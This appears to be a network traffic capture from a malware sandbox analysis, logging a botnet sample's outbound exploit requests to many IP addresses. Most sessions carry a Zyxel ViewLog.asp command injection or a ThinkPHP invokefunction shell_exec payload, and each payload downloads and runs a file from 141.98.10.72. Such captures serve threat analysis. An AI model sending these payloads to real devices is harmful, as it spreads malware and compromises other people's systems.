                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:18.554099083 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1037192.168.2.143988494.121.110.578080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:18.566739082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1038192.168.2.143408488.221.172.21380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:18.803436041 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:18.994699955 CET140INHTTP/1.1 400 Bad Request
                                                        Content-Length: 79
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head><title>Error</title></head><body><h1>Bad Request</h1></body></html>
                                                        Feb 14, 2024 09:35:19.042793036 CET140INHTTP/1.1 400 Bad Request
                                                        Content-Length: 79
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head><title>Error</title></head><body><h1>Bad Request</h1></body></html>
                                                        Feb 14, 2024 09:35:19.143151045 CET140INHTTP/1.1 400 Bad Request
                                                        Content-Length: 79
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head><title>Error</title></head><body><h1>Bad Request</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1039192.168.2.145547288.99.127.4480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:18.817512989 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:19.022222042 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:35:18 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1040192.168.2.145568488.221.236.17980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:18.825623035 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:19.038671017 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:35:18 GMT
                                                        Date: Wed, 14 Feb 2024 08:35:18 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 39 62 35 33 65 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 37 31 38 26 23 34 36 3b 33 63 32 38 33 32 35 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;99b53e17&#46;1707899718&#46;3c28325f</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1041192.168.2.143601488.88.67.8980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:18.850512981 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1042192.168.2.143409288.221.172.21380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:18.995935917 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:19.189177990 CET140INHTTP/1.1 400 Bad Request
                                                        Content-Length: 79
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head><title>Error</title></head><body><h1>Bad Request</h1></body></html>
                                                        Feb 14, 2024 09:35:19.237818956 CET140INHTTP/1.1 400 Bad Request
                                                        Content-Length: 79
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head><title>Error</title></head><body><h1>Bad Request</h1></body></html>
                                                        Feb 14, 2024 09:35:19.338553905 CET140INHTTP/1.1 400 Bad Request
                                                        Content-Length: 79
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head><title>Error</title></head><body><h1>Bad Request</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1043192.168.2.145844694.8.141.1488080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:19.029905081 CET303INHTTP/1.1 400 Bad Request
                                                        Server: sky_router
                                                        X-Frame-Options: Deny
                                                        Cache-Control: no-cache
                                                        Date: Wed, 14 Feb 2024 08:35:18 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1044192.168.2.146035488.14.88.13480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:19.069479942 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:19.289916992 CET315INHTTP/1.1 400 Bad Request
                                                        Server: openresty
                                                        Date: Wed, 14 Feb 2024 08:35:19 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 154
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1045192.168.2.143368695.101.104.12880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:19.503405094 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:19.718107939 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:35:19 GMT
                                                        Date: Wed, 14 Feb 2024 08:35:19 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 37 38 31 30 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 37 31 39 26 23 34 36 3b 37 66 33 64 66 66 37 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;4781002&#46;1707899719&#46;7f3dff7d</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1046192.168.2.145409695.181.216.10480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:19.511307001 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:19.734360933 CET413INHTTP/1.0 407 Proxy Authentication Required
                                                        Proxy-Authenticate: Basic realm="login"
                                                        Connection: close
                                                        Content-type: text/html; charset=utf-8
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 32 3e 3c 68 33 3e 41 63 63 65 73 73 20 74 6f 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 69 73 61 6c 6c 6f 77 65 64 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 72 20 79 6f 75 20 6e 65 65 64 20 76 61 6c 69 64 20 75 73 65 72 6e 61 6d 65 2f 70 61 73 73 77 6f 72 64 20 74 6f 20 75 73 65 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>407 Proxy Authentication Required</title></head><body><h2>407 Proxy Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1047192.168.2.143366695.237.182.20080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:19.534423113 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:19.787173033 CET516INHTTP/1.0 400 Bad Request
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Date: Wed, 14 Feb 2024 08:35:18 GMT
                                                        Server: lighttpd/1.4.19
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1048192.168.2.143579231.220.107.748080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:20.989567041 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1049192.168.2.145472231.136.133.348080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:21.044470072 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:21.699472904 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:23.011404991 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:25.795295000 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:31.171159983 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:41.666691065 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:03.169931889 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1050192.168.2.145949885.196.145.508080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:21.064181089 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
